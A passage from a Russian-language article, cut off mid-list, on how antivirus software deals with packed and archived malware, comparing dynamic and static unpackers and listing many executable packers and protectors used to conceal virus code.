ΠŸΠΎΠ΄Π΄Π΅Ρ€ΠΆΠΊΠ° большого количСства разновидностСй ΡƒΠΏΠ°ΠΊΠΎΠ²Ρ‰ΠΈΠΊΠΎΠ² ΠΈ Π°Ρ€Ρ…ΠΈΠ²Π°Ρ‚ΠΎΡ€ΠΎΠ² особСнно ΠΊΡ€ΠΈΡ‚ΠΈΡ‡Π½Π° для ΠΏΡ€ΠΎΠ²Π΅Ρ€ΠΊΠΈ ΠΏΠΎΡ‡Ρ‚ΠΎΠ²Ρ‹Ρ… систСм, Ρ‚Π°ΠΊ ΠΊΠ°ΠΊ ΠΏΠΎΠ΄Π°Π²Π»ΡΡŽΡ‰Π°Ρ Ρ‡Π°ΡΡ‚ΡŒ вирусов пСрСсылаСтся ΠΏΠΎ ΠΏΠΎΡ‡Ρ‚Π΅ Π² Π°Ρ€Ρ…ΠΈΠ²ΠΈΡ€ΠΎΠ²Π°Π½Π½ΠΎΠΌ Π²ΠΈΠ΄Π΅.

Π’Π°ΠΌ навСрняка интСрСсно ΠΏΠΎΠ½ΡΡ‚ΡŒ Ρ€Π°Π·Π½ΠΈΡ†Ρƒ ΠΌΠ΅ΠΆΠ΄Ρƒ Π°Ρ€Ρ…ΠΈΠ²Π°Ρ‚ΠΎΡ€ΠΎΠΌ ΠΈ ΡƒΠΏΠ°ΠΊΠΎΠ²Ρ‰ΠΈΠΊΠΎΠΌ. А Ρ€Π°Π·Π½ΠΈΡ†Π° Π² Ρ‚ΠΎΠΌ, Ρ‡Ρ‚ΠΎ сТатоС ΡƒΠΏΠ°ΠΊΠΎΠ²Ρ‰ΠΈΠΊΠΎΠΌ разТимаСтся Π² ΠΏΠ°ΠΌΡΡ‚ΡŒ, Π°Ρ€Ρ…ΠΈΠ²Π°Ρ‚ΠΎΡ€ΠΎΠΌ – Π½Π° диск.

ΠŸΠΎΠ½ΡΡ‚Π½ΠΎ, Ρ‡Ρ‚ΠΎ Π΄ΠΎΠ±Ρ€Π°Ρ‚ΡŒΡΡ Π΄ΠΎ ΡƒΠΏΠ°ΠΊΠΎΠ²Π°Π½Π½ΠΎΠ³ΠΎ ΠΊΠΎΠ΄Π° ΠΌΠΎΠΆΠ½ΠΎ, лишь распаковав Π΅Π³ΠΎ. Но ΠΈ это Π½Π΅ всСгда просто. ΠŸΠΎΡΠΌΠΎΡ‚Ρ€ΠΈΠΌ ΠΏΠΎΡ‡Π΅ΠΌΡƒ.

Распаковщики дСлятся Π½Π° динамичСскиС ΠΈ статичСскиС. ДинамичСскиС распаковщики (Π½Π°ΠΏΡ€ΠΈΠΌΠ΅Ρ€, procdump ΠΈΠ»ΠΈ PEiD) Π·Π°ΠΏΡƒΡΠΊΠ°ΡŽΡ‚ Ρ„Π°ΠΉΠ» ΠΈ ΡΠΎΠ·Π΄Π°ΡŽΡ‚ распакованный Π²Π°Ρ€ΠΈΠ°Π½Ρ‚ Ρ„Π°ΠΉΠ»Π° ΠΈΠ· ΠΎΠ±Ρ€Π°Π·Π°, Π·Π°Π³Ρ€ΡƒΠΆΠ΅Π½Π½ΠΎΠ³ΠΎ Π² ΠΏΠ°ΠΌΡΡ‚ΡŒ. Однако, Ссли этот Ρ„Π°ΠΉΠ» содСрТал вирус (Π° ΠΎΠ½ Π΅Π³ΠΎ содСрТит!), систСма ΠΌΠΎΠΆΠ΅Ρ‚ Π±Ρ‹Ρ‚ΡŒ ΠΏΠΎΠ²Ρ€Π΅ΠΆΠ΄Π΅Π½Π° Ρ€Π°Π½ΡŒΡˆΠ΅, Ρ‡Π΅ΠΌ антивирус успССт Ρ‡Ρ‚ΠΎ-Π»ΠΈΠ±ΠΎ ΡΠ΄Π΅Π»Π°Ρ‚ΡŒ. ΠšΡ€ΠΎΠΌΠ΅ Ρ‚ΠΎΠ³ΠΎ, Ρƒ ΡƒΠΏΠ°ΠΊΠΎΠ²Ρ‰ΠΈΠΊΠΎΠ² сущСствуСт ряд ΠΏΡ€ΠΈΠ΅ΠΌΠΎΠ² Π±ΠΎΡ€ΡŒΠ±Ρ‹ с динамичСской распаковкой, Π½Π°ΠΏΡ€ΠΈΠΌΠ΅Ρ€ Ρ€Π°ΡΡˆΠΈΡ„Ρ€ΠΎΠ²Ρ‹Π²Π°Ρ‚ΡŒ ΠΊΠΎΠ΄ Π½Π΅ ΠΏΠΎΠ»Π½ΠΎΡΡ‚ΡŒΡŽ, Π° лишь ΠΏΠΎ ΠΌΠ΅Ρ€Π΅ исполнСния, ΠΈΠ»ΠΈ, Π½Π°ΠΏΡ€ΠΈΠΌΠ΅Ρ€, Ρ€Π°ΡΡˆΠΈΡ„Ρ€ΠΎΠ²Ρ‹Π²Π°Ρ‚ΡŒ ΠΈ Π·Π°ΠΏΡƒΡΠΊΠ°Ρ‚ΡŒ вирус Ρ†Π΅Π»ΠΈΠΊΠΎΠΌ Ρ‚ΠΎΠ»ΡŒΠΊΠΎ Π² ΠΎΠΏΡ€Π΅Π΄Π΅Π»Π΅Π½Π½Ρ‹ΠΉ дСнь Π½Π΅Π΄Π΅Π»ΠΈ.

БтатичСскиС распаковщики – это Ρ‚Π΅, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ ΠΏΡ‹Ρ‚Π°ΡŽΡ‚ΡΡ Ρ€Π°ΡΠΏΠ°ΠΊΠΎΠ²Π°Ρ‚ΡŒ Ρ„Π°ΠΉΠ», Π½Π΅ запуская Π΅Π³ΠΎ (Π½Π°ΠΏΡ€ΠΈΠΌΠ΅Ρ€, CUP386 ΠΈΠ»ΠΈ UNP). ΠžΡ‡Π΅Π½ΡŒ часто статичСскиС распаковщики ΠΎΠΊΠ°Π·Ρ‹Π²Π°ΡŽΡ‚ΡΡ бСсполСзны, Ссли Π°Π»Π³ΠΎΡ€ΠΈΡ‚ΠΌ ΡƒΠΏΠ°ΠΊΠΎΠ²ΠΊΠΈ Ρ‚Ρ€Π΅Π±ΡƒΠ΅Ρ‚ запуска Ρ„Π°ΠΉΠ»Π°.

Π§Ρ‚ΠΎΠ±Ρ‹ ΠΏΡ€Π΅Π΄ΡΡ‚Π°Π²ΠΈΡ‚ΡŒ сСбС вСсь Ρ€Π°Π·ΠΌΠ°Ρ… ΡƒΠΏΠ°ΠΊΠΎΠ²ΠΊΠΈ, достаточно привСсти этот скромный список ΡƒΠΏΠ°ΠΊΠΎΠ²Ρ‰ΠΈΠΊΠΎΠ², примСняСмых ΠΏΡ€ΠΈ сокрытии вирусного ΠΊΠΎΠ΄Π°: EP (ExE Pack), ACProtect, Active PE Scrambler, AHTeam UPX Mutanter, Armadillo SPS, ASPack, ASProtect, ASProtect SKE, aUS [Advanced UPX Scrambler], Beria, DEF, Enigma Protector, Exe Stealth, Exe32Pack, EXECryptor, EXERefactor, eXPressor, Fake Ninja, fileEncrypt, FSG, GPcH Protect, Hide PE, HidePX, hyings PE-Armor, JDPack, KByS Packer, kkrunchy, Krypton The Krypter, Mew 11 SE, MoleBox Pro, Morphine, mPack, MSLRH, nPack, NsPack, Obsidium, ORiEN, Packman, PC Guard, PE Diminisher, PECompact, PELock, PEQuake, PESpin, PeStubOEP, Petite, PeX, Private exe Protector, PseudoSignerRLP, SDProtector Pro, Special EXE Password Protector, SHProtector, ShrinkWrap, SLVc0deProtector, Spirits PE Crasher, Stealth PE, tElock, Themida,